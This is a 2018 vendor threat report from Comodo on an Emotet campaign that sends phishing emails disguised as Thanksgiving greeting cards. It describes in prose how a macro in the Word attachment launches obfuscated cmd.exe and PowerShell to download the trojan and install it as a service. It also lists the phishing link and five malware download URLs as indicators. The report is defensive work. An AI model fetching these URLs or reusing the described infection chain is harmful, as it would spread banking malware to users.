November 23, 2018 | By Comodo
- loading - Poisoned Gift for Thanksgivingday | Break into Bank AccountLoading…

Cybercriminals fond of celebration dates like Thanksgiving Day — but not for the same reason that upstanding people do. For the perpetrators, it’s the favorite time to attack. Why? Because people are tuned on pleasant and good thoughts and feelings on such days. Unfortunately, it makes them more vulnerable. When they see a greeting letter in the inboxes, they feel gratitude and curiosity — who sent it?—and click on the attached file without thinking about potential danger.

On the eve of this Thanksgiving day Comodo specialists intercepted a cunning attack aimed at propagating one of the currently most nefarious malware – Emotet trojan, usually used for stealing banking credentials and other private information.

Usually this malware spread mostly as a finance-related email like a message from a . Here is an example of such email intercepted by Comodo facilities.

Bill-Pay-Alert  - Bill Pay Alert - Poisoned Gift for Thanksgivingday | Break into Bank Account

As you can see, the attackers used well-prepared able to deceive even security aware user. The link in the email leads to “rozdroza.com/En_us/Clients_Messages/11_18” URL. If a user clicks the link, the Microsoft Office document file automatically drops on her machine.

But on the eve of the Thanksgiving day the perpetrators decided to make something special and disguise the infected file as a greeting card. Below are the samples of the phishing emails they are using in the new attack.

Thanksgivingday-congradulation  - Thanksgivingday congradulation - Poisoned Gift for Thanksgivingday | Break into Bank Account

 

- Thanksgivingday wishes - Poisoned Gift for Thanksgivingday | Break into Bank Account

Thanksgivingday-Greeting_Card  - Thanksgivingday Greeting Card - Poisoned Gift for Thanksgivingday | Break into Bank Account

As you can see, these emails are also carefully worked out to look plausible. They have different content but in every case it’s build to inspire pleasant and warm emotions in the victims. Be it a hearty greeting, admiration of a colleague or even a piece of poetry, it arouses a good mood in the victims, thus weakening their vigilance.

The quotes of great people at the bottom of the messages also used to inspire trust in the victims, raising chances they will open the document – and let the enemy in the house. In reality, the “greeting card” is a Word document infected with Emotet.

Let’s look at the whole killing chain of this cunning malware.

The infected file has embedded Macro script. When a user opens a “greeting card”, the macros downloads Emotet on the ’s machine.  

First, the user is instructed to enable the execution of Macro content as the document contains a VBA stream designed to download and execute the malware.

Office-365  - Office 365 - Poisoned Gift for Thanksgivingday | Break into Bank Account

 

Auto-Open  - Auto Open - Poisoned Gift for Thanksgivingday | Break into Bank Account

If the user allows the active content to run, the will call cmd.exe with modified parameters that will again call cmd.exe with obfuscated parameters that, finally, pass a script to powershell.exe designed to download and run binaries from the internet.

The obfuscated parameters used to launch cmd.exe are stored in a textbox that is resized to be unnoticeable for the victim.

Command-Box  - Command Box - Poisoned Gift for Thanksgivingday | Break into Bank Account

 

Explorer-window  - Explorer window - Poisoned Gift for Thanksgivingday | Break into Bank Account

After that, the script probes five locations to download Emotet: anora71.uz/aH3i9EM, egyptmotours.com/EfRRkqPucD, friskyeliquid.com/xspcYyA63, m3produtora.com/QOlBVnrL40, litsey4.ru/V5XLXxDubY.

Then it downloads the malware to the user’s Temporary folder and executes it. Emotet moves itself to C:WindowsSysWOW64cachingplain.exe and creates a service to run during system startup.

Parameters  - Parameters - Poisoned Gift for Thanksgivingday | Break into Bank Account

 

Create-Service  - Create Service - Poisoned Gift for Thanksgivingday | Break into Bank Account

The newly created service connects to the C&;C server to notify availability and receive commands.

From this moment, the infected machine is under total control of the attackers. They can extract the users’ credential, banking and other private information from the PC and continue the attack by downloading other types of malware.

Frame-Summary  - Frame Summary - Poisoned Gift for Thanksgivingday | Break into Bank Account

“The attack is a complicated poisoned merge of refined well-disguised malware and psychological manipulation tricks”, says Fatih Orhan, The Head of Comodo Threat Research Labs. “It’s not only dangerous and destroying from the technical point of view but especially cynic and immoral because of exploiting peoples’ bright feelings in a grand holiday. It’s always bad to be robbed but it’s much worse to be robbed in such a great holiday and aware that perpetrators used your own bright feelings against you. I’m really glad we protected our customers from these painful consequences and didn’t let the perpetrators spoil a celebration of such a grand day”.

 

The heatmap and details of the attack

The attack started on November 19, 2018 at 18:34:12 and was continuing at the moment of creating this article. It was conducted from 26 IPs of 10 countries. 108 phishing emails are discovered for the moment and supposedly, the attack will reach its peak on Thanksgiving day.

 

The countries involved in the attack and number of emails sent per country

table-data  - table data - Poisoned Gift for Thanksgivingday | Break into Bank Account

The heatmap

Map-Locations  - Map Locations - Poisoned Gift for Thanksgivingday | Break into Bank Account

Live secure with Comodo!

Be Sociable, Share!

  • - more - Poisoned Gift for Thanksgivingday | Break into Bank Account






Source link
Based Blockchain Network

LEAVE A REPLY

Please enter your comment!
Please enter your name here